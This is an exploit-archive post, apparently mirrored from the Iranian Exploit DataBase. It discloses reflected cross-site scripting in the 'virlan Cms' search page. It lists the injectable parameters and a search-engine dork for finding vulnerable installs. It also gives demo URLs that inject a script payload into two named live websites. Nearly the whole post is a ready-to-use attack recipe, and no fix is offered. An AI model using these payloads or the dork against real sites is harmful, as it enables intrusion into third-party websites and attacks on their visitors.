virlan Cms Cross-Site Scripting Vulnerabilities
2013-07-28 15:40:26Inviato da: irist.ir
#################################
# Iranian Exploit DataBase
# http://iedb.ir
#################################
# Exploit Title : virlan Cms Cross-Site Scripting Vulnerabilities
# Author : Iranian Exploit DataBase
# Discovered By : IeDb
# Email : [email protected]
# Home : http://iedb.ir
# Software Link : http://www.virlan.com/
# Security Risk : High
# Tested on : Linux
# Dork : "طراØÙ� ساÙ�ت در Ù�Ù�رÙ�Ù�"
#################################
# Exploit :
# http://www.Site.com/search.php?search_id=[Xss]
# http://www.Site.com/search.php?s=[Xss]
# Dem0 :
# http://maadkoush.ir/fa/search.php?search_id="><script>alert(/IeDb.Ir/)</script>
# http://www.ads.virlan.co/search.php?s="><script>alert(/IeDb.Ir/)</script>
#################################
# Exploit Archive = http://www.iedb.ir/exploits-235.html
#################################
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.